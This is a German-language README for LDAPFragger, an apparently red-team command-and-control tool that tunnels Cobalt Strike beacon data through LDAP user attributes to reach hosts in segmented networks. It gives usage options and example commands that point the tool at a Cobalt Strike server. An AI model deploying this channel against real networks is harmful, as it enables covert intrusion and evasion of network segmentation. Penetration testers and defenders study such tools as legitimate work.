
C2-Tool, das Cobalt-Strike-Beacon-Daten über LDAP-Benutzerattribute leitet, für verdeckte Command-and-Control in segmentierten Netzwerken.
LDAPFragger ist ein Command-and-Control-Tool, das Angreifern ermöglicht, Cobalt-Strike-Beacon-Daten über LDAP unter Verwendung von Benutzerattributen zu leiten.
Hintergrundinformationen finden Sie im Release-Blog: http://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes
.NET 4.0, funktioniert aber möglicherweise auch mit älteren und neueren .NET-Frameworks. _ _ __
| | | | / _|
| | __| | __ _ _ __ | |_ _ __ __ _ __ _ __ _ ___ _ __
| |/ _` |/ _` | '_ \| _| '__/ _` |/ _` |/ _` |/ _ \ '__|
| | (_| | (_| | |_) | | | | | (_| | (_| | (_| | __/ |
|_|\__,_|\__,_| .__/|_| |_| \__,_|\__, |\__, |\___|_|
| | __/ | __/ |
|_| |___/ |___/
Fox-IT - Rindert Kramer
Usage:
--cshost: IP address or hostname of the Cobalt Strike instance
--csport: Port of the external C2 interface on the Cobalt Strike server
-u: Username to connect to Active Directory
-p: Password to connect to Active Directory
-d: FQDN of the Active Directory domain
--ldaps: Use LDAPS instead of LDAP
-v: Verbose output
-h: Display this message
If no AD credentials are provided, integrated AD authentication will be used.
Beispielverwendung:

Führen Sie im Netzwerksegment A aus:
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port>
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port> -u <username> -p <password> -d <domain FQDN>
Führen Sie im Netzwerksegment B aus:
LDAPFragger
LDAPFragger -u <username> -p <password> -d <domain FQDN>
LDAPS kann mit dem Flag --LDAPS verwendet werden, jedoch wird auch der reguläre LDAP-Verkehr verschlüsselt. Beachten Sie bitte, dass die standardmäßige Cobalt-Strike-Nutzlast von den meisten AV-Programmen erkannt wird.